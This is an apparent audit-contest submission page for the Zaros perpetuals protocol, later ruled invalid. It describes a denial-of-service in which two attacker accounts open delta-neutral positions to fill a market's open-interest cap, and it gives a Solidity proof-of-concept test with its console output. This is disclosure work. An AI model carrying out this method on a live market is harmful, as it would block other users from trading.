Zaros Part 1

Zaros

DeFiFoundry

60,000 USDC

View results

Previous Next

Submission Details

Severity: high

Invalid

An attacker can create a delta neutral position to reach the max open interest to DOS other users from trading in that market

spearmint

Summary

An attacker can create an equal long and short position to reach the maximum open interest so that no other users can trade in that market.

Vulnerability Details

An attacker can create an equal long and short position to reach the maximum open interest so that no other users can trade in that market.

Since the position is delta neutral they are not taking any risk to price fluctuations of the market asset.

At this point no other users can trade in that market

Add the following POC to createMarketOrder.t.sol

function test__createDeltaNeutralPositionToReachMaxOpenInterestAndDosAllUsers() public {

// setup the attacker and honest user

uint256 marginValueUsdc = 8_000_000e6;

int128 userPositionSizeDelta = 500_000_000e18;

deal({ token: address(usdc), to: users.naruto.account, give: marginValueUsdc });

deal({ token: address(usdc), to: users.sasuke.account, give: marginValueUsdc });

// attackers create trading accounts and deposit tokens as collateral

changePrank({ msgSender: users.naruto.account });

uint128 tradingAccountIdLong = createAccountAndDeposit(marginValueUsdc / 2, address(usdc));

uint128 tradingAccountIdShort = createAccountAndDeposit(marginValueUsdc / 2, address(usdc));

// Attackers open position a long position

openManualPosition(

DOGE_USD_MARKET_ID, DOGE_USD_STREAM_ID, MOCK_DOGE_USD_PRICE, tradingAccountIdLong, userPositionSizeDelta / 2

);

// Attackers use a different account to open an equal short position

openManualPosition(

DOGE_USD_MARKET_ID, DOGE_USD_STREAM_ID, MOCK_DOGE_USD_PRICE, tradingAccountIdShort, -userPositionSizeDelta / 2

);

// Honest user tried to trade in the market but it reverts permanently

changePrank({ msgSender: users.sasuke.account });

uint128 tradingAccountIdHonest = createAccountAndDeposit(marginValueUsdc, address(usdc));

openManualPosition(

DOGE_USD_MARKET_ID, DOGE_USD_STREAM_ID, MOCK_DOGE_USD_PRICE, tradingAccountIdHonest, 1000e18

);

}

Console Output

Ran 1 test for test/integration/perpetuals/order-branch/createMarketOrder/createMarketOrder.t.sol:CreateMarketOrder_Integration_Test

[FAIL. Reason: ExceedsOpenInterestLimit(6, 500000000000000000000000000 [5e26], 500001000000000000000000000 [5e26])] test__createDeltaNeutralPositionToReachMaxOpenInterestAndDosAllUsers() (gas: 2339782)

Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 26.76ms (3.45ms CPU time)

Ran 1 test suite in 60.09ms (26.76ms CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests)

Failing tests:

Encountered 1 failing test in test/integration/perpetuals/order-branch/createMarketOrder/createMarketOrder.t.sol:CreateMarketOrder_Integration_Test

Encountered a total of 1 failing tests, 0 tests succeeded

Impact

Complete DOS of trading to all other users for that market

Users will not use zaros if they cannot trade in certain markets

Tools Used

Manual review

Recommendations

This will require a complex solution to prevent introducing other vulnerabilities, I could not come up with one in the time boxed audit.

Updates

Lead Judging Commences

inallhonesty Lead Judge

10 months ago

inallhonesty Lead Judge 10 months ago

Submission Judgement Published

Invalidated

Reason: Non-acceptable severity

Prize pool breakdown

Total prize

60,000 USDC

nSLOC

2,878

21 USDC / LOC

High Medium

50,000 USDC

Low

5,500 USDC

Judges

4,500 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.